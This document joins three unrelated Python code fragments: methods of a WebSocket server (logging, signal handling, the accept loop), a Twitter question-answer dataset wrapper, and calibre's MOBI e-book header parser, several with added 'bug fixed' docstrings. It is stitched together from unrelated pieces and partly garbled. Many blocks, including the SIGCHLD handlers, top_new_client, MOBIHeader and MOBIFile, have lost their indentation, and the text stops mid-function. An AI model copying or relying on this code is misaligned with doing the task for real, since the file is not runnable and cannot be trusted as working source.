#
# WebSocketServer logging/output functions
#
def msg(self, *args, **kwargs):
    """ Output message as info """
    # Thin wrapper over self.logger; args/kwargs are passed straight
    # through to logging.Logger.log() (printf-style message + args).
    self.logger.log(logging.INFO, *args, **kwargs)

def vmsg(self, *args, **kwargs):
    """ Same as msg() but as debug. """
    self.logger.log(logging.DEBUG, *args, **kwargs)

def warn(self, *args, **kwargs):
    """ Same as msg() but as warning. """
    self.logger.log(logging.WARN, *args, **kwargs)
#
# Events that can/should be overridden in sub-classes
#
def started(self):
    """ Called after WebSockets startup """
    # Subclass hook; runs after daemonizing in start_server().
    self.vmsg("WebSockets server started")

def poll(self):
    """ Run periodically while waiting for connections. """
    # Subclass hook invoked once per accept-loop iteration; the
    # default implementation does nothing.
    #self.vmsg("Running poll()")
    pass

def terminate(self):
    # Unwinds out of the accept loop in start_server() by raising the
    # server's Terminate exception; this call never returns normally.
    raise self.Terminate()
def multiprocessing_SIGCHLD(self, sig, stack):
self.vmsg('Reaing zombies, active child count is %s', len(multiprocessing.active_children()))
def fallback_SIGCHLD(self, sig, stack):
# Reap zombies when using os.fork() (python 2.4)
self.vmsg("Got SIGCHLD, reaping zombies")
try:
result = os.waitpid(-1, os.WNOHANG)
while result[0]:
self.vmsg("Reaped child process %s" % result[0])
result = os.waitpid(-1, os.WNOHANG)
except (OSError):
pass
def do_SIGINT(self, sig, stack):
    # Signal handler installed by start_server(); converts Ctrl-C into
    # the server's Terminate exception via self.terminate().
    self.msg("Got SIGINT, exiting")
    self.terminate()

def do_SIGTERM(self, sig, stack):
    # Same as do_SIGINT, but for SIGTERM.
    self.msg("Got SIGTERM, exiting")
    self.terminate()
def top_new_client(self, startsock, address):
""" Do something with a WebSockets client connection. """
# handler process
client = None
try:
try:
client = self.do_handshake(startsock, address)
except self.EClose:
_, exc, _ = sys.exc_info()
# Connection was not a WebSockets connection
if exc.args[0]:
self.msg("%s: %s" % (address[0], exc.args[0]))
except WebSocketServer.Terminate:
raise
except Exception:
_, exc, _ = sys.exc_info()
self.msg("handler exception: %s" % str(exc))
self.vmsg("exception", exc_info=True)
finally:
if client and client != startsock:
# Close the SSL wrapped socket
# Original socket closed by caller
client.close()
def start_server(self):
    """
    Daemonize if requested. Listen for connections. Run
    do_handshake() method for each connection. If the connection
    is a WebSockets client then call new_websocket_client() method
    (which must be overridden) for each new client connection.

    Bug fixed: the generic `except Exception:` handler at the bottom of
    the accept loop logged `exc` without ever binding it, raising
    NameError instead of reporting the real error; it now captures the
    active exception via sys.exc_info() first (matching the inner
    handler's style).
    """
    lsock = self.socket(self.listen_host, self.listen_port, False,
                        self.prefer_ipv6,
                        tcp_keepalive=self.tcp_keepalive,
                        tcp_keepcnt=self.tcp_keepcnt,
                        tcp_keepidle=self.tcp_keepidle,
                        tcp_keepintvl=self.tcp_keepintvl)

    if self.daemon:
        self.daemonize(keepfd=lsock.fileno(), chdir=self.web)

    self.started()  # Some things need to happen after daemonizing

    # Allow override of signals; remember the previous handlers so
    # they can be restored on exit.
    original_signals = {
        signal.SIGINT: signal.getsignal(signal.SIGINT),
        signal.SIGTERM: signal.getsignal(signal.SIGTERM),
        signal.SIGCHLD: signal.getsignal(signal.SIGCHLD),
    }
    signal.signal(signal.SIGINT, self.do_SIGINT)
    signal.signal(signal.SIGTERM, self.do_SIGTERM)
    if not multiprocessing:
        # os.fork() (python 2.4) child reaper
        signal.signal(signal.SIGCHLD, self.fallback_SIGCHLD)
    else:
        # make sure that _cleanup is called when children die
        # by calling active_children on SIGCHLD
        signal.signal(signal.SIGCHLD, self.multiprocessing_SIGCHLD)

    last_active_time = self.launch_time
    try:
        while True:
            try:
                try:
                    startsock = None
                    pid = err = 0
                    child_count = 0

                    if multiprocessing:
                        # Collect zombie child processes
                        child_count = len(multiprocessing.active_children())

                    time_elapsed = time.time() - self.launch_time
                    if self.timeout and time_elapsed > self.timeout:
                        self.msg('listener exit due to --timeout %s'
                                 % self.timeout)
                        break

                    if self.idle_timeout:
                        idle_time = 0
                        if child_count == 0:
                            idle_time = time.time() - last_active_time
                        else:
                            idle_time = 0
                            last_active_time = time.time()

                        if idle_time > self.idle_timeout and child_count == 0:
                            self.msg('listener exit due to --idle-timeout %s'
                                     % self.idle_timeout)
                            break

                    try:
                        self.poll()

                        # 1-second select timeout so poll()/timeouts
                        # keep running even with no connections.
                        ready = select.select([lsock], [], [], 1)[0]
                        if lsock in ready:
                            startsock, address = lsock.accept()
                        else:
                            continue
                    except self.Terminate:
                        raise
                    except Exception:
                        # Extract a best-effort errno from whatever
                        # exception type was raised.
                        _, exc, _ = sys.exc_info()
                        if hasattr(exc, 'errno'):
                            err = exc.errno
                        elif hasattr(exc, 'args'):
                            err = exc.args[0]
                        else:
                            err = exc[0]
                        if err == errno.EINTR:
                            self.vmsg("Ignoring interrupted syscall")
                            continue
                        else:
                            raise

                    if self.run_once:
                        # Run in same process if run_once
                        self.top_new_client(startsock, address)
                        if self.ws_connection:
                            self.msg('%s: exiting due to --run-once'
                                     % address[0])
                            break
                    elif multiprocessing:
                        self.vmsg('%s: new handler Process' % address[0])
                        p = multiprocessing.Process(
                                target=self.top_new_client,
                                args=(startsock, address))
                        p.start()
                        # child will not return
                    else:
                        # python 2.4
                        self.vmsg('%s: forking handler' % address[0])
                        pid = os.fork()
                        if pid == 0:
                            # child handler process
                            self.top_new_client(startsock, address)
                            break  # child process exits

                    # parent process
                    self.handler_id += 1

                except (self.Terminate, SystemExit, KeyboardInterrupt):
                    self.msg("In exit")
                    break
                except Exception:
                    # FIX: bind the active exception before logging it;
                    # the original referenced an undefined name `exc`.
                    _, exc, _ = sys.exc_info()
                    self.msg("handler exception: %s", str(exc))
                    self.vmsg("exception", exc_info=True)
            finally:
                if startsock:
                    startsock.close()
    finally:
        # Close listen port
        self.vmsg("Closing socket listening at %s:%s",
                  self.listen_host, self.listen_port)
        lsock.close()

    # Restore signals
    for sig, func in original_signals.items():
        signal.signal(sig, func)
import data_utils
import numpy as np
PATH = '../data/twitter/'


class Twitter(object):
    """Train/test wrapper around the preprocessed twitter QA corpus.

    Bugs fixed versus the original:
      - split_data() was defined (nested in __init__) but never invoked,
        so self.data was never populated and batch() always failed; the
        split now runs during __init__.
      - the configured `path` argument was ignored (a hard-coded
        '../data/' was passed to load_data); `path` is now honoured.
      - batch() indexed with the tuple `[start, end]` (a single element
        lookup / IndexError) instead of the slice `[start:end]`, and
        shuffled `range(batch_size)` indices unrelated to the requested
        batch; it now returns the requested batch shuffled within itself.

    The vocab lookup tables are also exposed as attributes (i2w / w2i)
    instead of being discarded as locals.
    """

    def __init__(self, path=PATH):
        # Load the idx-encoded question/answer arrays and vocab metadata.
        metadata, idx_q, idx_a = data_utils.load_data(path)
        # id -> word and word -> id lookup tables
        self.i2w = metadata['idx2w']
        self.w2i = metadata['w2idx']
        self._split_data(idx_q, idx_a)

    def _split_data(self, idx_q, idx_a, train_fraction=0.8):
        """Shuffle all examples and split them into train/test sets."""
        n = len(idx_q)
        n_train = int(n * train_fraction)
        order = np.random.permutation(n)
        q, a = idx_q[order], idx_a[order]
        self.data = {
            'train': (q[:n_train], a[:n_train]),
            'test': (q[n_train:], a[n_train:]),
        }

    def batch(self, batch_size, idx, data_key='train'):
        """Return batch number `idx` (rows idx*batch_size .. (idx+1)*batch_size)
        of the requested split, with the rows shuffled within the batch."""
        x, y = self.data[data_key]
        start, end = idx * batch_size, (idx + 1) * batch_size
        bx, by = x[start:end], y[start:end]
        perm = np.random.permutation(len(bx))
        return bx[perm], by[perm]
#!/usr/bin/env python2
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2012, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import struct, datetime, os
from calibre.utils.date import utc_tz
from calibre.ebooks.mobi.reader.headers import NULL_INDEX
from calibre.ebooks.mobi.langcodes import main_language, sub_language
from calibre.ebooks.mobi.debug import format_bytes
from calibre.ebooks.mobi.utils import get_trailing_data
# PalmDB {{{
class PalmDOCAttributes(object):
    """Decode the PalmDB attributes bit-field (bytes 32-34 of the header).

    Bug fixed: the last two flags used the masks 0x12 and 0x14, which are
    multi-bit values (0x10|0x02 and 0x10|0x04) and would therefore report
    True whenever the unrelated read-only/dirty/install bits were set.
    Per the Palm OS database header specification the flags are single
    bits: 0x20 (reset after install) and 0x40 (copy prevention / no beam).
    """

    class Attr(object):
        """A single named flag extracted from the attributes word."""

        def __init__(self, name, field, val):
            self.name = name
            # Non-zero iff the flag's bit is set in the attributes word.
            self.val = val & field

        def __str__(self):
            return '%s: %s'%(self.name, bool(self.val))

    def __init__(self, raw):
        # Little-endian 16-bit attributes word.
        self.val = struct.unpack(b'<H', raw)[0]
        self.attributes = []
        for name, field in [('Read Only', 0x02), ('Dirty AppInfoArea', 0x04),
                            ('Backup this database', 0x08),
                            ('Okay to install newer over existing copy, if present on PalmPilot', 0x10),
                            ('Force the PalmPilot to reset after this database is installed', 0x20),
                            ('Don\'t allow copy of file to be beamed to other Pilot',
                                0x40)]:
            self.attributes.append(PalmDOCAttributes.Attr(name, field,
                                                          self.val))

    def __str__(self):
        attrs = '\n\t'.join([str(x) for x in self.attributes])
        return 'PalmDOC Attributes: %s\n\t%s'%(bin(self.val), attrs)
class PalmDB(object):
    """Parse the 78-byte PalmDB (PDB) file header at the start of a MOBI file."""

    def __init__(self, raw):
        self.raw = raw

        if self.raw.startswith(b'TPZ'):
            raise ValueError('This is a Topaz file')

        # Database name: 32 bytes, NUL padded.
        self.name = self.raw[:32].replace(b'\x00', b'')
        self.attributes = PalmDOCAttributes(self.raw[32:34])
        self.version = struct.unpack(b'>H', self.raw[34:36])[0]

        # Palm timestamps count seconds from the 1904-01-01 Mac epoch
        # (interpreted here as UTC).
        palm_epoch = datetime.datetime(1904, 1, 1, tzinfo=utc_tz)
        self.creation_date_raw = struct.unpack(b'>I', self.raw[36:40])[0]
        self.creation_date = (palm_epoch +
                datetime.timedelta(seconds=self.creation_date_raw))
        self.modification_date_raw = struct.unpack(b'>I', self.raw[40:44])[0]
        self.modification_date = (palm_epoch +
                datetime.timedelta(seconds=self.modification_date_raw))
        self.last_backup_date_raw = struct.unpack(b'>I', self.raw[44:48])[0]
        self.last_backup_date = (palm_epoch +
                datetime.timedelta(seconds=self.last_backup_date_raw))

        self.modification_number = struct.unpack(b'>I', self.raw[48:52])[0]
        self.app_info_id = self.raw[52:56]
        self.sort_info_id = self.raw[56:60]

        # type (4 bytes) + creator (4 bytes) identify the book format;
        # only MOBI ('BOOKMOBI') and PalmDOC ('TEXTREAD') are accepted.
        self.type = self.raw[60:64]
        self.creator = self.raw[64:68]
        self.ident = self.type + self.creator
        if self.ident not in (b'BOOKMOBI', b'TEXTREAD'):
            raise ValueError('Unknown book ident: %r'%self.ident)

        self.last_record_uid, = struct.unpack(b'>I', self.raw[68:72])
        self.next_rec_list_id = self.raw[72:76]
        self.number_of_records, = struct.unpack(b'>H', self.raw[76:78])

    def __str__(self):
        # Human-readable dump of every parsed header field.
        ans = ['*'*20 + ' PalmDB Header '+ '*'*20]
        ans.append('Name: %r'%self.name)
        ans.append(str(self.attributes))
        ans.append('Version: %s'%self.version)
        ans.append('Creation date: %s (%s)'%(self.creation_date.isoformat(),
            self.creation_date_raw))
        ans.append('Modification date: %s (%s)'%(self.modification_date.isoformat(),
            self.modification_date_raw))
        ans.append('Backup date: %s (%s)'%(self.last_backup_date.isoformat(),
            self.last_backup_date_raw))
        ans.append('Modification number: %s'%self.modification_number)
        ans.append('App Info ID: %r'%self.app_info_id)
        ans.append('Sort Info ID: %r'%self.sort_info_id)
        ans.append('Type: %r'%self.type)
        ans.append('Creator: %r'%self.creator)
        ans.append('Last record UID +1: %r'%self.last_record_uid)
        ans.append('Next record list id: %r'%self.next_rec_list_id)
        ans.append('Number of records: %s'%self.number_of_records)
        return '\n'.join(ans)
# }}}
class Record(object): # {{{
    """One PalmDB record: its raw bytes plus directory-entry header fields."""

    def __init__(self, raw, header):
        offset, flags, uid = header
        self.offset = offset
        self.flags = flags
        self.uid = uid
        self.raw = raw

    @property
    def header(self):
        """One-line summary of this record's directory entry."""
        fmt = 'Offset: %d Flags: %d UID: %d First 4 bytes: %r Size: %d'
        return fmt % (self.offset, self.flags, self.uid,
                      self.raw[:4], len(self.raw))
# }}}
# EXTH {{{
class EXTHRecord(object):
    """One EXTH metadata record.

    `length` is the total record length from the file, i.e. it INCLUDES
    the 8-byte type/length header, so the payload is (length - 8) bytes
    (length == 9 -> one data byte, etc.).

    Bug fixed: the integer-decoding membership test used the name
    'Clipping Limit (3xx)' while the name table defines type 301 as
    'Clipping Limit [3xx]', so type-301 records were never unpacked and
    stayed as raw bytes. The set now matches the table.
    """

    def __init__(self, type_, data, length):
        self.type = type_
        self.data = data
        self.length = length
        # Human-readable name; unknown types fall back to repr(type).
        self.name = {
                1 : 'Drm Server Id',
                2 : 'Drm Commerce Id',
                3 : 'Drm Ebookbase Book Id',
                100 : 'Creator',
                101 : 'Publisher',
                102 : 'Imprint',
                103 : 'Description',
                104 : 'ISBN',
                105 : 'Subject',
                106 : 'Published',
                107 : 'Review',
                108 : 'Contributor',
                109 : 'Rights',
                110 : 'SubjectCode',
                111 : 'Type',
                112 : 'Source',
                113 : 'ASIN',
                114 : 'versionNumber',
                115 : 'sample',
                116 : 'StartOffset',
                117 : 'Adult',
                118 : 'Price',
                119 : 'Currency',
                121 : 'KF8_Boundary_Section',
                122 : 'fixed-layout',
                123 : 'book-type',
                124 : 'orientation-lock',
                125 : 'KF8_Count_of_Resources_Fonts_Images',
                126 : 'original-resolution',
                127 : 'zero-gutter',
                128 : 'zero-margin',
                129 : 'KF8_Masthead/Cover_Image',
                131 : 'KF8_Unidentified_Count',
                132 : 'RegionMagnification',
                200 : 'DictShortName',
                201 : 'CoverOffset',
                202 : 'ThumbOffset',
                203 : 'Fake Cover',
                204 : 'Creator Software',
                205 : 'Creator Major Version', # '>I'
                206 : 'Creator Minor Version', # '>I'
                207 : 'Creator Build Number', # '>I'
                208 : 'Watermark',
                209 : 'Tamper Proof Keys [hex]',
                300 : 'Font Signature [hex]',
                301 : 'Clipping Limit [3xx]', # percentage '>B'
                401 : 'Clipping Limit', # percentage '>B'
                402 : 'Publisher Limit',
                404 : 'Text to Speech Disabled', # '>B' 1 - TTS disabled 0 - TTS enabled
                501 : 'CDE Type', # 4 chars (PDOC, EBOK, MAGZ, ...)
                502 : 'last_update_time',
                503 : 'Updated Title',
                504 : 'ASIN [5xx]',
                508 : 'Unknown Title Furigana?',
                517 : 'Unknown Creator Furigana?',
                522 : 'Unknown Publisher Furigana?',
                524 : 'Language',
                525 : 'primary-writing-mode',
                527 : 'page-progression-direction',
                528 : 'Override Kindle fonts',
                534 : 'Input Source Type',
                535 : 'Kindlegen Build-Rev Number',
                536 : 'Container Info', # CONT_Header is 0, Ends with CONTAINER_BOUNDARY (or Asset_Type?)
                538 : 'Container Resolution',
                539 : 'Container Mimetype',
                543 : 'Container id', # FONT_CONTAINER, BW_CONTAINER, HD_CONTAINER
        }.get(self.type, repr(self.type))

        # Records known to carry big-endian unsigned integers are
        # decoded according to their payload size.
        if (self.name in {'sample', 'StartOffset', 'CoverOffset', 'ThumbOffset', 'Fake Cover',
                'Creator Software', 'Creator Major Version', 'Creator Minor Version',
                'Creator Build Number', 'Clipping Limit [3xx]', 'Clipping Limit',
                'Publisher Limit', 'Text to Speech Disabled'} or
                self.type in {121, 125, 131}):
            if self.length == 9:
                self.data, = struct.unpack(b'>B', self.data)
            elif self.length == 10:
                self.data, = struct.unpack(b'>H', self.data)
            else:
                self.data, = struct.unpack(b'>L', self.data)
        elif self.type in {209, 300}:
            # NOTE(review): str.encode('hex') is Python-2-only; this
            # path needs binascii.hexlify under Python 3.
            self.data = bytes(self.data.encode('hex'))

    def __str__(self):
        return '%s (%d): %r'%(self.name, self.type, self.data)
class EXTHHeader(object):
    """Parse an EXTH metadata block: b'EXTH' + length + count + records."""

    def __init__(self, raw):
        self.raw = raw
        if not self.raw.startswith(b'EXTH'):
            raise ValueError('EXTH header does not start with EXTH')
        # Total length of the EXTH block and the number of records in it.
        self.length, = struct.unpack(b'>L', self.raw[4:8])
        self.count, = struct.unpack(b'>L', self.raw[8:12])
        # First record starts right after the 12-byte EXTH header.
        pos = 12
        self.records = []
        for i in xrange(self.count):
            pos = self.read_record(pos)
        self.records.sort(key=lambda x:x.type)
        # type -> record map for O(1) lookups (later duplicate wins).
        self.rmap = {x.type:x for x in self.records}

    def __getitem__(self, type_):
        # Decoded data for the record of the given type; KeyError if absent.
        return self.rmap.__getitem__(type_).data

    def get(self, type_, default=None):
        # dict.get()-style lookup returning the record's data or default.
        ans = self.rmap.get(type_, default)
        return getattr(ans, 'data', default)

    def read_record(self, pos):
        # Record layout: >L type, >L length (INCLUDING these 8 bytes),
        # then (length - 8) payload bytes. Returns offset of next record.
        type_, length = struct.unpack(b'>LL', self.raw[pos:pos+8])
        data = self.raw[(pos+8):(pos+length)]
        self.records.append(EXTHRecord(type_, data, length))
        return pos + length

    @property
    def kf8_header_index(self):
        # EXTH 121 points at the KF8 boundary record; NULL_INDEX means
        # "no KF8 part", normalized to None here.
        ans = self.get(121, None)
        if ans == NULL_INDEX:
            ans = None
        return ans

    def __str__(self):
        ans = ['*'*20 + ' EXTH Header '+ '*'*20]
        ans.append('EXTH header length: %d'%self.length)
        ans.append('Number of EXTH records: %d'%self.count)
        ans.append('EXTH records...')
        for r in self.records:
            ans.append(str(r))
        return '\n'.join(ans)
# }}}
class MOBIHeader(object): # {{{
def __init__(self, record0, offset):
self.raw = record0.raw
self.header_offset = offset
self.compression_raw = self.raw[:2]
self.compression = {1: 'No compression', 2: 'PalmDoc compression',
17480: 'HUFF/CDIC compression'}.get(struct.unpack(b'>H',
self.compression_raw)[0],
repr(self.compression_raw))
self.unused = self.raw[2:4]
self.text_length, = struct.unpack(b'>I', self.raw[4:8])
self.number_of_text_records, self.text_record_size = \
struct.unpack(b'>HH', self.raw[8:12])
self.encryption_type_raw, = struct.unpack(b'>H', self.raw[12:14])
self.encryption_type = {
0: 'No encryption',
1: 'Old mobipocket encryption',
2: 'Mobipocket encryption'
}.get(self.encryption_type_raw, repr(self.encryption_type_raw))
self.unknown = self.raw[14:16]
self.identifier = self.raw[16:20]
if self.identifier != b'MOBI':
raise ValueError('Identifier %r unknown'%self.identifier)
self.length, = struct.unpack(b'>I', self.raw[20:24])
self.type_raw, = struct.unpack(b'>I', self.raw[24:28])
self.type = {
2 : 'Mobipocket book',
3 : 'PalmDOC book',
4 : 'Audio',
257 : 'News',
258 : 'News Feed',
259 : 'News magazine',
513 : 'PICS',
514 : 'Word',
515 : 'XLS',
516 : 'PPT',
517 : 'TEXT',
518 : 'HTML',
}.get(self.type_raw, repr(self.type_raw))
self.encoding_raw, = struct.unpack(b'>I', self.raw[28:32])
self.encoding = {
1252 : 'cp1252',
65001: 'utf-8',
}.get(self.encoding_raw, repr(self.encoding_raw))
self.uid = self.raw[32:36]
self.file_version, = struct.unpack(b'>I', self.raw[36:40])
self.meta_orth_indx, self.meta_infl_indx = struct.unpack(
b'>II', self.raw[40:48])
self.secondary_index_record, = struct.unpack(b'>I', self.raw[48:52])
self.reserved = self.raw[52:80]
self.first_non_book_record, = struct.unpack(b'>I', self.raw[80:84])
self.fullname_offset, = struct.unpack(b'>I', self.raw[84:88])
self.fullname_length, = struct.unpack(b'>I', self.raw[88:92])
self.locale_raw, = struct.unpack(b'>I', self.raw[92:96])
langcode = self.locale_raw
langid = langcode & 0xFF
sublangid = (langcode >> 10) & 0xFF
self.language = main_language.get(langid, 'ENGLISH')
self.sublanguage = sub_language.get(sublangid, 'NEUTRAL')
self.input_language = self.raw[96:100]
self.output_langauage = self.raw[100:104]
self.min_version, = struct.unpack(b'>I', self.raw[104:108])
self.first_image_index, = struct.unpack(b'>I', self.raw[108:112])
self.huffman_record_offset, = struct.unpack(b'>I', self.raw[112:116])
self.huffman_record_count, = struct.unpack(b'>I', self.raw[116:120])
self.datp_record_offset, = struct.unpack(b'>I', self.raw[120:124])
self.datp_record_count, = struct.unpack(b'>I', self.raw[124:128])
self.exth_flags, = struct.unpack(b'>I', self.raw[128:132])
self.has_exth = bool(self.exth_flags & 0x40)
self.has_drm_data = self.length >= 174 and len(self.raw) >= 184
if self.has_drm_data:
self.unknown3 = self.raw[132:168]
self.drm_offset, self.drm_count, self.drm_size, self.drm_flags = \
struct.unpack(b'>4I', self.raw[168:184])
self.has_extra_data_flags = self.length >= 232 and len(self.raw) >= 232+16
self.has_fcis_flis = False
self.has_multibytes = self.has_indexing_bytes = self.has_uncrossable_breaks = False
self.extra_data_flags = 0
if self.has_extra_data_flags:
self.unknown4 = self.raw[184:192]
if self.file_version < 8:
self.first_text_record, self.last_text_record = \
struct.unpack_from(b'>HH', self.raw, 192)
self.fdst_count = struct.unpack_from(b'>L', self.raw, 196)
else:
self.fdst_idx, self.fdst_count = struct.unpack_from(b'>LL',
self.raw, 192)
if self.fdst_count <= 1:
self.fdst_idx = NULL_INDEX
(self.fcis_number, self.fcis_count, self.flis_number,
self.flis_count) = struct.unpack(b'>IIII',
self.raw[200:216])
self.unknown6 = self.raw[216:224]
self.srcs_record_index = struct.unpack(b'>I',
self.raw[224:228])[0]
self.num_srcs_records = struct.unpack(b'>I',
self.raw[228:232])[0]
self.unknown7 = self.raw[232:240]
self.extra_data_flags = struct.unpack(b'>I',
self.raw[240:244])[0]
self.has_multibytes = bool(self.extra_data_flags & 0b1)
self.has_indexing_bytes = bool(self.extra_data_flags & 0b10)
self.has_uncrossable_breaks = bool(self.extra_data_flags & 0b100)
self.primary_index_record, = struct.unpack(b'>I',
self.raw[244:248])
if self.length >= 248:
(self.sect_idx, self.skel_idx, self.datp_idx, self.oth_idx
) = struct.unpack_from(b'>4L', self.raw, 248)
self.unknown9 = self.raw[264:self.length+16]
if self.meta_orth_indx not in {NULL_INDEX, self.sect_idx}:
raise ValueError('KF8 header has different Meta orth and '
'section indices')
# The following are all relative to the position of the header record
# make them absolute for ease of debugging
self.relative_records = {'sect_idx', 'skel_idx', 'datp_idx', 'oth_idx',
'meta_orth_indx', 'huffman_record_offset',
'first_non_book_record', 'datp_record_offset', 'fcis_number',
'flis_number', 'primary_index_record', 'fdst_idx',
'first_image_index'}
for x in self.relative_records:
if hasattr(self, x) and getattr(self, x) != NULL_INDEX:
setattr(self, x, self.header_offset+getattr(self, x))
# Try to find the first non-text record
self.first_resource_record = offset + 1 + self.number_of_text_records # Default to first record after all text records
pointer = min(getattr(self, 'first_non_book_record', NULL_INDEX), getattr(self, 'first_image_index', NULL_INDEX))
if pointer != NULL_INDEX:
self.first_resource_record = max(pointer, self.first_resource_record)
self.last_resource_record = NULL_INDEX
if self.has_exth:
self.exth_offset = 16 + self.length
self.exth = EXTHHeader(self.raw[self.exth_offset:])
self.end_of_exth = self.exth_offset + self.exth.length
self.bytes_after_exth = self.raw[self.end_of_exth:self.fullname_offset]
if self.exth.kf8_header_index is not None and offset == 0:
# MOBI 6 header in a joint file, adjust self.last_resource_record
self.last_resource_record = self.exth.kf8_header_index - 2
def __str__(self):
ans = ['*'*20 + ' MOBI %d Header '%self.file_version+ '*'*20]
a = ans.append
def i(d, x):
x = 'NULL' if x == NULL_INDEX else x
a('%s: %s'%(d, x))
def r(d, attr):
x = getattr(self, attr)
if attr in self.relative_records and x != NULL_INDEX:
a('%s: Absolute: %d Relative: %d'%(d, x, x-self.header_offset))
else:
i(d, x)
a('Compression: %s'%self.compression)
a('Unused: %r'%self.unused)
a('Text length: %d'%self.text_length)
a('Number of text records: %d'%self.number_of_text_records)
a('Text record size: %d'%self.text_record_size)
a('Encryption: %s'%self.encryption_type)
a('Unknown: %r'%self.unknown)
a('Identifier: %r'%self.identifier)
a('Header length: %d'% self.length)
a('Type: %s'%self.type)
a('Encoding: %s'%self.encoding)
a('UID: %r'%self.uid)
a('File version: %d'%self.file_version)
r('Meta Orth Index', 'meta_orth_indx')
r('Meta Infl Index', 'meta_infl_indx')
r('Secondary index record', 'secondary_index_record')
a('Reserved: %r'%self.reserved)
r('First non-book record', 'first_non_book_record')
a('Full name offset: %d'%self.fullname_offset)
a('Full name length: %d bytes'%self.fullname_length)
a('Langcode: %r'%self.locale_raw)
a('Language: %s'%self.language)
a('Sub language: %s'%self.sublanguage)
a('Input language: %r'%self.input_language)
a('Output language: %r'%self.output_langauage)
a('Min version: %d'%self.min_version)
r('First Image index', 'first_image_index')
r('Huffman record offset', 'huffman_record_offset')
a('Huffman record count: %d'%self.huffman_record_count)
r('Huffman table offset', 'datp_record_offset')
a('Huffman table length: %r'%self.datp_record_count)
a('EXTH flags: %s (%s)'%(bin(self.exth_flags)[2:], self.has_exth))
if self.has_drm_data:
a('Unknown3: %r'%self.unknown3)
r('DRM Offset', 'drm_offset')
a('DRM Count: %s'%self.drm_count)
a('DRM Size: %s'%self.drm_size)
a('DRM Flags: %r'%self.drm_flags)
if self.has_extra_data_flags:
a('Unknown4: %r'%self.unknown4)
if hasattr(self, 'first_text_record'):
a('First content record: %d'%self.first_text_record)
a('Last content record: %d'%self.last_text_record)
else:
r('FDST Index', 'fdst_idx')
a('FDST Count: %d'% self.fdst_count)
r('FCIS number', 'fcis_number')
a('FCIS count: %d'% self.fcis_count)
r('FLIS number', 'flis_number')
a('FLIS count: %d'% self.flis_count)
a('Unknown6: %r'% self.unknown6)
r('SRCS record index', 'srcs_record_index')
a('Number of SRCS records?: %d'%self.num_srcs_records)
a('Unknown7: %r'%self.unknown7)
a(('Extra data flags: %s (has multibyte: %s) '
'(has indexing: %s) (has uncrossable breaks: %s)')%(
bin(self.extra_data_flags), self.has_multibytes,
self.has_indexing_bytes, self.has_uncrossable_breaks))
r('NCX index', 'primary_index_record')
if self.length >= 248:
r('Sections Index', 'sect_idx')
r('SKEL Index', 'skel_idx')
r('DATP Index', 'datp_idx')
r('Other Index', 'oth_idx')
if self.unknown9:
a('Unknown9: %r'%self.unknown9)
ans = '\n'.join(ans)
if self.has_exth:
ans += '\n\n' + str(self.exth)
ans += '\n\nBytes after EXTH (%d bytes): %s'%(
len(self.bytes_after_exth),
format_bytes(self.bytes_after_exth))
ans += '\nNumber of bytes after full name: %d' % (len(self.raw) - (self.fullname_offset +
self.fullname_length))
ans += '\nRecord 0 length: %d'%len(self.raw)
return ans
# }}}
class MOBIFile(object):
def __init__(self, stream):
self.raw = stream.read()
self.palmdb = PalmDB(self.raw[:78])
self.record_headers = []
self.records = []
for i in xrange(self.palmdb.number_of_records):
pos = 78 + i * 8
offset, a1, a2, a3, a4 = struct.unpack(b'>LBBBB', self.raw[pos:pos+8])
flags, val = a1, a2 << 16 | a3 << 8 | a4
self.record_headers.append((offset, flags, val))
def section(section_number):
if section_number == self.palmdb.number_of_records - 1:
end_off = len(self.raw)
else:
end_off = self.record_headers[section_number + 1][0]
off = self.record_headers[section_number][0]
return self.raw[off:end_off]
for i in range(self.palmdb.number_of_records):
self.records.append(Record(section(i), self.record_headers[i]))
self.mobi_header = MOBIHeader(self.records[0], 0)
self.huffman_record_nums = []
self.kf8_type = None
mh = mh8 = self.mobi_header
if mh.file_version >= 8:
self.kf8_type = 'standalone'
elif mh.has_exth and mh.exth.kf8_header_index is not None:
kf8i = mh.exth.kf8_header_index
try:
rec = self.records[kf8i-1]
except IndexError:
pass
else:
if rec.raw == b'BOUNDARY':
self.kf8_type = 'joint'
mh8 = MOBIHeader(self.records[kf8i], kf8i)
self.mobi8_header = mh8
if 'huff' in self.mobi_header.compression.lower():
from calibre.ebooks.mobi.huffcdic import HuffReader
def huffit(off, cnt):
huffman_record_nums = list(xrange(off, off+cnt))
huffrecs = [self.records[r].raw for r in huffman_record_nums]
huffs = HuffReader(huffrecs)
return huffman_record_nums, huffs.unpack
if self.kf8_type == 'joint':
recs6, d6 = huffit(mh.huffman_record_offset,
mh.huffman_record_count)
recs8, d8 = huffit(mh8.huffman_record_offset,
mh8.huffman_record_count)
self.huffman_record_nums = recs6 + recs8
else:
self.huffman_record_nums, d6 = huffit(mh.huffman_record_offset,
mh.huffman_record_count)
d8 = d6
elif 'palmdoc' in self.mobi_header.compression.lower():
from calibre.ebooks.compression.palmdoc import decompress_doc
d8 = d6 = decompress_doc
else:
d8 = d6 = lambda x: x
self.decompress6, self.decompress8 = d6, d8
class TextRecord(object): # {{{
    """A single decompressed MOBI text record plus its parsed trailing data."""

    def __init__(self, idx, record, extra_data_flags, decompress):
        # Strip the trailing entries flagged in the MOBI header
        # (multibyte overlap / indexing / uncrossable breaks) before
        # decompressing the remaining payload.
        self.trailing_data, self.raw = get_trailing_data(record.raw, extra_data_flags)
        raw_trailing_bytes = record.raw[len(self.raw):]
        self.raw = decompress(self.raw)

        # Rename the numeric trailing-data keys to human-readable names.
        if 0 in self.trailing_data:
            self.trailing_data['multibyte_overlap'] = self.trailing_data.pop(0)
        if 1 in self.trailing_data:
            self.trailing_data['indexing'] = self.trailing_data.pop(1)
        if 2 in self.trailing_data:
            self.trailing_data['uncrossable_breaks'] = self.trailing_data.pop(2)
        self.trailing_data['raw_bytes'] = raw_trailing_bytes

        # Anything still keyed by an int is trailing data we do not know
        # how to interpret; report it for debugging.
        for typ, val in self.trailing_data.iteritems():
            if isinstance(typ, int):
                print ('Record %d has unknown trailing data of type: %d : %r'%
                        (idx, typ, val))

        self.idx = idx

    def dump(self, folder):
        # Write the decompressed text to <folder>/<idx>.txt and the
        # trailing data to <folder>/<idx>.trailing_data.
        name = '%06d'%self.idx
        with open(os.path.join(folder, name+'.txt'), 'wb') as f:
